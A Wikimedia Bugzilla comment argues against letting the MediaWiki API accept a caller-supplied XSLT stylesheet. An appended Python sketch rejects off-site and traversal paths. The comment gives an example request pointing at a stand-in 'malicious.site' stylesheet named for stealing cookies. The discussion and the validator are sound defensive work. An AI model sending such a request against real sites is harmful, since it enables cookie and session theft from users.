https://bugzilla.wikimedia.org/show_bug.cgi?id=19528
--- Comment #4 from Victor Vasiliev <[email protected]> 2009-07-11 06:18:18 UTC ---
(In reply to comment #2)
> The processing will still be done client-side: The bug opener refers to the
> <?xml-stylesheet href="location-to.xsl" type="text/xsl" ?> which could
> optionally be added to the top of the XML document in order to have a direct
> transformation when viewed in the web browser.
>

And what if someone points to a malicious XSLT? E.g.
api.php?action=query&xslt=http://malicious.site/steal-cookies.xslt

Also, this is API. *Application* programming interface. It's not intended to
format a user-readable output. I suggest WONTFIX.
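
The risk raised in the comment above, sketched as a server-side check (an added example, not part of the original comment and not MediaWiki code): a caller-supplied stylesheet value is refused unless it names a reviewed same-origin file, so an off-site URL never reaches the `<?xml-stylesheet ?>` instruction. The `/static/xsl/` directory and the function names are assumptions made for illustration.

```python
import re
from typing import Optional
from urllib.parse import urlsplit
from xml.sax.saxutils import quoteattr

# Assumption: stylesheets the site operator has reviewed live in this
# same-origin directory and have plain file names.
_ALLOWED = re.compile(r"/static/xsl/[A-Za-z0-9_-]+\.xsl")


def reject_reason(param: str) -> Optional[str]:
    """Return why a requested stylesheet value is refused, or None if accepted."""
    try:
        parts = urlsplit(param)
    except ValueError:
        return "malformed URL"
    # A scheme or host means the browser would fetch the XSLT from another
    # site; "//host/path" (protocol-relative) is caught by the netloc test.
    if parts.scheme or parts.netloc:
        return "off-site URL"
    # Everything else must match the strict local pattern: no "..", no
    # percent-encoding, no query string, no backslashes.
    if not _ALLOWED.fullmatch(param):
        return "not a reviewed local stylesheet"
    return None


def stylesheet_pi(param: Optional[str]) -> str:
    """Build the xml-stylesheet processing instruction, or '' when refused."""
    if not param or reject_reason(param) is not None:
        return ""
    return f"<?xml-stylesheet href={quoteattr(param)} type=\"text/xsl\" ?>\n"


if __name__ == "__main__":
    # Constructed sample values; the first is the URL from the comment.
    for value in (
        "http://malicious.site/steal-cookies.xslt",
        "//malicious.site/steal-cookies.xslt",
        "/static/xsl/../../upload/x.xsl",
        "/static/xsl/table.xsl",
    ):
        print(f"{value!r:50} -> {reject_reason(value) or 'accepted'}")
```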
